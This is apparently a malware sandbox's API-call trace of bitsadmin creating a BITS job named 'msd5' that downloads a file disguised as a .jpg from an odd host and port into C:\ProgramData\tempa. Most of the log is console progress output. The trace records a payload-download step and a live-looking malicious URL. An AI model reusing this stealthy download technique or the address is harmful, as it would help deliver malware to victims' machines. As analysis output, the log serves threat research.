[0069.529] GetProcAddress (hModule=0x75370000, lpProcName="HeapSetInformation") returned 0x753c4157
[0069.529] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0069.530] GetCurrentProcess () returned 0xffffffff
[0069.530] GetCurrentThread () returned 0xfffffffe
[0069.530] GetCurrentProcess () returned 0xffffffff
[0069.530] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0xa6c3b0, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0xa6c3b0*=0x80) returned 1
[0069.530] SetConsoleCtrlHandler (HandlerRoutine=0xa574cb, Add=1) returned 1
[0069.530] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0069.530] GetProcAddress (hModule=0x75370000, lpProcName="SetThreadUILanguage") returned 0x753c24c2
[0069.530] SetThreadUILanguage (LangId=0x0) returned 0x409
[0069.530] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437"
[0069.531] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437"
[0069.531] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437"
[0069.532] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437"
[0069.532] _wcsicmp (_String1="/transfer", _String2="/RAWRETURN") returned 2
[0069.532] _wcsicmp (_String1="/transfer", _String2="/WRAP") returned -3
[0069.532] _wcsicmp (_String1="/transfer", _String2="/NOWRAP") returned 6
[0069.532] swprintf_s (in: _Dst=0xefe88, _SizeInWords=0x12, _Format="%u.%u.%u" | out: _Dst="7.5.7601") returned 8
[0069.533] GetFileType (hFile=0x7) returned 0x2
[0069.533] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0xefdfc | out: lpMode=0xefdfc) returned 1
[0069.533] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xefe2c, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xefe2c*=0x2) returned 1
[0069.533] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x24, lpNumberOfCharsWritten=0xefe38, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xefe38*=0x24) returned 1
[0069.534] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xefe3c, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xefe3c*=0x1e) returned 1
[0069.534] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x29, lpNumberOfCharsWritten=0xefe40, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xefe40*=0x29) returned 1
[0069.534] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xefe44, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xefe44*=0x2) returned 1
[0069.534] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x5e, lpNumberOfCharsWritten=0xefe48, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xefe48*=0x5e) returned 1
[0069.534] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x58, lpNumberOfCharsWritten=0xefe4c, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xefe4c*=0x58) returned 1
[0069.535] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xefe50, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xefe50*=0x2) returned 1
[0069.535] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0069.548] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0069.548] GetNumberOfConsoleInputEvents (in: hConsoleInput=0x3, lpNumberOfEvents=0xefe9c | out: lpNumberOfEvents=0xefe9c) returned 1
[0069.548] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0069.548] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0xa6c3a8 | out: lpMode=0xa6c3a8) returned 1
[0069.549] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xa6c390 | out: lpConsoleScreenBufferInfo=0xa6c390) returned 1
[0069.549] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0xa6c38c | out: lpMode=0xa6c38c) returned 1
[0069.549] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0069.549] _wcsicmp (_String1="/transfer", _String2="/HELP") returned 12
[0069.549] _wcsicmp (_String1="/transfer", _String2="/?") returned 53
[0069.549] _wcsicmp (_String1="/transfer", _String2="/UTIL") returned -1
[0069.550] _wcsicmp (_String1="/transfer", _String2="/LIST") returned 8
[0069.550] _wcsicmp (_String1="/transfer", _String2="/MONITOR") returned 7
[0069.550] _wcsicmp (_String1="/transfer", _String2="/RESET") returned 2
[0069.550] _wcsicmp (_String1="/transfer", _String2="/TRANSFER") returned 0
[0069.550] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x1) returned 1
[0069.550] _wcsicmp (_String1="/priority", _String2="/UPLOAD") returned -5
[0069.550] _wcsicmp (_String1="/priority", _String2="/DOWNLOAD") returned 12
[0069.550] _wcsicmp (_String1="/priority", _String2="/PRIORITY") returned 0
[0069.550] _wcsicmp (_String1="foreground", _String2="FOREGROUND") returned 0
[0069.550] CoCreateInstance (in: rclsid=0xa565d4*(Data1=0x4991d34b, Data2=0x80a1, Data3=0x4291, Data4=([0]=0x83, [1]=0xb6, [2]=0x33, [3]=0x28, [4]=0x36, [5]=0x6b, [6]=0x90, [7]=0x97)), pUnkOuter=0x0, dwClsContext=0x4, riid=0xa565b4*(Data1=0x5ce34c0d, Data2=0xdc9, Data3=0x4c1f, Data4=([0]=0x89, [1]=0x7c, [2]=0xda, [3]=0xa1, [4]=0xb7, [5]=0x8c, [6]=0xee, [7]=0x7c)), ppv=0xa6c3b4 | out: ppv=0xa6c3b4*=0x18a53c) returned 0x0
[0069.601] IBackgroundCopyManager:CreateJob (in: This=0x18a53c, DisplayName="msd5", Type=0x0, pJobId=0xefe64, ppJob=0xefe60 | out: pJobId=0xefe64*(Data1=0xa764b49e, Data2=0x881a, Data3=0x4afb, Data4=([0]=0x88, [1]=0xaf, [2]=0xf6, [3]=0x26, [4]=0xba, [5]=0xfd, [6]=0xfd, [7]=0xcc)), ppJob=0xefe60*=0x18a614) returned 0x0
[0069.607] CoTaskMemAlloc (cb=0x50) returned 0x1a0c88
[0069.607] IUnknown:AddRef (This=0x18a614) returned 0x2
[0069.607] IUnknown:AddRef (This=0x18a614) returned 0x3
[0069.607] PeekMessageW (in: lpMsg=0xefddc, hWnd=0x0, wMsgFilterMin=0x400, wMsgFilterMax=0x400, wRemoveMsg=0x0 | out: lpMsg=0xefddc) returned 0
[0069.607] IUnknown:Release (This=0x18a614) returned 0x2
[0069.607] IBackgroundCopyJob:SetPriority (This=0x18a614, Val=0x0) returned 0x0
[0069.610] IBackgroundCopyJob:AddFile (This=0x18a614, RemoteUrl="http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmf.jpg.zip?161905089", LocalName="C:\\ProgramData\\tempa\\marxvxinhhmf.jpg") returned 0x0
[0069.621] IBackgroundCopyJob:SetNotifyFlags (This=0x18a614, Val=0xb) returned 0x0
[0069.625] IBackgroundCopyJob:SetNotifyInterface (This=0x18a614, Val=0x1a0c88) returned 0x0
[0069.625] IUnknown:QueryInterface (in: This=0x1a0c88, riid=0x76a63e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xef8e0 | out: ppvObject=0xef8e0*=0x0) returned 0x80004002
[0069.625] IUnknown:QueryInterface (in: This=0x1a0c88, riid=0x76a63e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xef8a0 | out: ppvObject=0xef8a0*=0x0) returned 0x80004002
[0069.625] IUnknown:QueryInterface (in: This=0x1a0c88, riid=0x76a597c4*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xef888 | out: ppvObject=0xef888*=0x0) returned 0x80004002
[0069.625] IUnknown:QueryInterface (in: This=0x1a0c88, riid=0x76a69b0c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xef83c | out: ppvObject=0xef83c*=0x1a0c88) returned 0x0
[0069.625] IUnknown:AddRef (This=0x1a0c88) returned 0x3
[0069.625] IUnknown:QueryInterface (in: This=0x1a0c88, riid=0x76a4c15c*(Data1=0x18, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xef79c | out: ppvObject=0xef79c*=0x0) returned 0x80004002
[0069.625] IUnknown:QueryInterface (in: This=0x1a0c88, riid=0x76a4c0a8*(Data1=0x19, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1a0d9c | out: ppvObject=0x1a0d9c*=0x0) returned 0x80004002
[0069.625] IUnknown:QueryInterface (in: This=0x1a0c88, riid=0x76a4c16c*(Data1=0x4c1e39e1, Data2=0xe3e3, Data3=0x4296, Data4=([0]=0xaa, [1]=0x86, [2]=0xec, [3]=0x93, [4]=0x8d, [5]=0x89, [6]=0x6e, [7]=0x92)), ppvObject=0xef7a4 | out: ppvObject=0xef7a4*=0x0) returned 0x80004002
[0069.625] IUnknown:Release (This=0x1a0c88) returned 0x2
[0069.628] IUnknown:QueryInterface (in: This=0x1a0c88, riid=0x191950*(Data1=0x659cdeac, Data2=0x489e, Data3=0x11d9, Data4=([0]=0xa9, [1]=0xcd, [2]=0x0, [3]=0xd, [4]=0x56, [5]=0x96, [6]=0x52, [7]=0x51)), ppvObject=0xeecac | out: ppvObject=0xeecac*=0x0) returned 0x80004002
[0069.628] IUnknown:QueryInterface (in: This=0x1a0c88, riid=0x191950*(Data1=0x97ea99c7, Data2=0x186, Data3=0x4ad4, Data4=([0]=0x8d, [1]=0xf9, [2]=0xc5, [3]=0xb4, [4]=0xe0, [5]=0xed, [6]=0x6b, [7]=0x22)), ppvObject=0xeecac | out: ppvObject=0xeecac*=0x1a0c88) returned 0x0
[0069.629] IUnknown:QueryInterface (in: This=0x1a0c88, riid=0x191950*(Data1=0x97ea99c7, Data2=0x186, Data3=0x4ad4, Data4=([0]=0x8d, [1]=0xf9, [2]=0xc5, [3]=0xb4, [4]=0xe0, [5]=0xed, [6]=0x6b, [7]=0x22)), ppvObject=0x1982d8 | out: ppvObject=0x1982d8*=0x1a0c88) returned 0x0
[0069.631] IBackgroundCopyJob:Resume (This=0x18a614) returned 0x0
[0069.634] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0069.634] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0069.634] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0xefdc0 | out: lpMode=0xefdc0) returned 1
[0069.638] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1b1) returned 1
[0069.638] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0xefe00*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0069.639] PeekMessageW (in: lpMsg=0xefdd8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xefdd8) returned 1
[0069.639] TranslateMessage (lpMsg=0xefdd8) returned 0
[0069.639] DispatchMessageW (lpMsg=0xefdd8) returned 0x1
[0069.640] IUnknown:QueryInterface (in: This=0x1a0c88, riid=0x76a4c17c*(Data1=0x1c733a30, Data2=0x2a1c, Data3=0x11ce, Data4=([0]=0xad, [1]=0xe5, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x44, [6]=0x77, [7]=0x3d)), ppvObject=0xef934 | out: ppvObject=0xef934*=0x0) returned 0x80004002
[0069.640] IBackgroundCopyCallback:JobModification (This=0x1a0c88, pJob=0x18a6a4, dwReserved=0x0) returned 0x0
[0069.640] IBackgroundCopyJob:GetState (in: This=0x18a614, pVal=0x1a0c94 | out: pVal=0x1a0c94) returned 0x0
[0069.640] IBackgroundCopyCallback:JobModification (This=0x1a0c88, pJob=0x18a6a4, dwReserved=0x0) returned 0x0
[0069.640] IBackgroundCopyJob:GetState (in: This=0x18a614, pVal=0x1a0c94 | out: pVal=0x1a0c94) returned 0x0
[0069.642] IBackgroundCopyJob:GetType (in: This=0x18a614, pVal=0xee408 | out: pVal=0xee408) returned 0x0
[0069.643] IBackgroundCopyJob:GetProgress (in: This=0x18a614, pVal=0x1a0c98 | out: pVal=0x1a0c98) returned 0x0
[0069.644] IBackgroundCopyJob:GetPriority (in: This=0x18a614, pVal=0xee404 | out: pVal=0xee404) returned 0x0
[0069.645] CoTaskMemFree (pv=0x0)
[0069.645] IBackgroundCopyJob:GetDisplayName (in: This=0x18a614, pVal=0xee41c | out: pVal=0xee41c*="msd5") returned 0x0
[0069.646] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xee3c4 | out: lpConsoleScreenBufferInfo=0xee3c4) returned 1
[0069.646] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0xee3dc | out: lpNumberOfCharsWritten=0xee3dc) returned 1
[0069.646] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0xee3dc | out: lpNumberOfAttrsWritten=0xee3dc) returned 1
[0069.647] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0069.647] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0069.647] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xee3b0 | out: lpConsoleScreenBufferInfo=0xee3b0) returned 1
[0069.648] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0xee3c8, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xee3c8*=0xa) returned 1
[0069.648] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0069.648] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xee3ac | out: lpConsoleScreenBufferInfo=0xee3ac) returned 1
[0069.648] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0xee3c4, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xee3c4*=0x5) returned 1
[0069.648] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0069.649] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xee3b4 | out: lpConsoleScreenBufferInfo=0xee3b4) returned 1
[0069.649] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xee3cc, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xee3cc*=0x7) returned 1
[0069.649] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0069.649] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xee3a8 | out: lpConsoleScreenBufferInfo=0xee3a8) returned 1
[0069.650] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xee3c0, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xee3c0*=0x8) returned 1
[0069.650] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0069.650] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xee3b0 | out: lpConsoleScreenBufferInfo=0xee3b0) returned 1
[0069.650] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xee3c8, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xee3c8*=0x8) returned 1
[0069.650] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0069.650] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xee3a4 | out: lpConsoleScreenBufferInfo=0xee3a4) returned 1
[0069.651] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0xee3bc, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xee3bc*=0xc) returned 1
[0069.651] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0069.651] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xee3b4 | out: lpConsoleScreenBufferInfo=0xee3b4) returned 1
[0069.651] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0xee3cc, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xee3cc*=0xa) returned 1
[0069.651] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0069.651] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xee39c | out: lpConsoleScreenBufferInfo=0xee39c) returned 1
[0069.652] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0xee3b4, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xee3b4*=0xa) returned 1
[0069.652] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0069.652] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xee3a4 | out: lpConsoleScreenBufferInfo=0xee3a4) returned 1
[0069.652] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xee3bc, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xee3bc*=0x8) returned 1
[0069.652] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0069.652] _vsnwprintf (in: _Buffer=0xa803f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0xee3c8 | out: _Buffer="0") returned 1
[0069.652] _vsnwprintf (in: _Buffer=0xa803f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0xee3d4 | out: _Buffer="1") returned 1
[0069.653] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xee3a4 | out: lpConsoleScreenBufferInfo=0xee3a4) returned 1
[0069.653] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0xee3bc, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xee3bc*=0x5) returned 1
[0069.653] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0069.653] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xee3ac | out: lpConsoleScreenBufferInfo=0xee3ac) returned 1
[0069.653] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xee3c4, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xee3c4*=0x8) returned 1
[0069.653] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0069.653] _vsnwprintf (in: _Buffer=0xa803f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0xee3d0 | out: _Buffer="0") returned 1
[0069.654] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xee3c4 | out: lpSystemTimeAsFileTime=0xee3c4*(dwLowDateTime=0xda20bcf0, dwHighDateTime=0x1d469c7))
[0069.654] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xee3bc | out: lpSystemTimeAsFileTime=0xee3bc*(dwLowDateTime=0xda20bcf0, dwHighDateTime=0x1d469c7))
[0069.654] _finite (_X=0x0) returned 0
[0069.654] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xee37c | out: lpConsoleScreenBufferInfo=0xee37c) returned 1
[0069.654] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0xee394, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xee394*=0xd) returned 1
[0069.654] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0069.654] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xee388 | out: lpConsoleScreenBufferInfo=0xee388) returned 1
[0069.654] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0xee3a0, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xee3a0*=0xf) returned 1
[0069.654] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0069.655] _vsnwprintf (in: _Buffer=0xee1b4, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0xee178 | out: _Buffer="0.00 B/S") returned 8
[0069.655] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xee3cc | out: lpConsoleScreenBufferInfo=0xee3cc) returned 1
[0069.655] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xee3e4, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xee3e4*=0x8) returned 1
[0069.655] CoTaskMemFree (pv=0x198370)
[0069.655] IBackgroundCopyJob:GetType (in: This=0x18a614, pVal=0xef4a0 | out: pVal=0xef4a0) returned 0x0
[0069.656] IBackgroundCopyJob:GetProgress (in: This=0x18a614, pVal=0x1a0c98 | out: pVal=0x1a0c98) returned 0x0
[0069.657] IBackgroundCopyJob:GetPriority (in: This=0x18a614, pVal=0xef49c | out: pVal=0xef49c) returned 0x0
[0069.658] CoTaskMemFree (pv=0x0)
[0069.658] IBackgroundCopyJob:GetDisplayName (in: This=0x18a614, pVal=0xef4b4 | out: pVal=0xef4b4*="msd5") returned 0x0
[0069.658] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xef45c | out: lpConsoleScreenBufferInfo=0xef45c) returned 1
[0069.658] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0xef474 | out: lpNumberOfCharsWritten=0xef474) returned 1
[0069.659] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0xef474 | out: lpNumberOfAttrsWritten=0xef474) returned 1
[0069.659] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0069.659] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0069.659] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xef448 | out: lpConsoleScreenBufferInfo=0xef448) returned 1
[0069.659] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0xef460, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xef460*=0xa) returned 1
[0069.659] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0069.660] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xef444 | out: lpConsoleScreenBufferInfo=0xef444) returned 1
[0069.660] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0xef45c, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xef45c*=0x5) returned 1
[0069.660] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0069.660] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xef44c | out: lpConsoleScreenBufferInfo=0xef44c) returned 1
[0069.660] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xef464, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xef464*=0x7) returned 1
[0069.660] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0069.661] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xef440 | out: lpConsoleScreenBufferInfo=0xef440) returned 1
[0069.661] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xef458, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xef458*=0x8) returned 1
[0069.661] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0069.661] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xef448 | out: lpConsoleScreenBufferInfo=0xef448) returned 1
[0069.661] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xef460, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xef460*=0x8) returned 1
[0069.661] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0069.662] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xef43c | out: lpConsoleScreenBufferInfo=0xef43c) returned 1
[0069.662] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0xef454, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xef454*=0xc) returned 1
[0069.662] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0069.662] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xef44c | out: lpConsoleScreenBufferInfo=0xef44c) returned 1
[0069.662] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0xef464, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xef464*=0xa) returned 1
[0069.662] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0069.663] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xef434 | out: lpConsoleScreenBufferInfo=0xef434) returned 1
[0069.663] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0xef44c, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xef44c*=0xa) returned 1
[0069.663] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
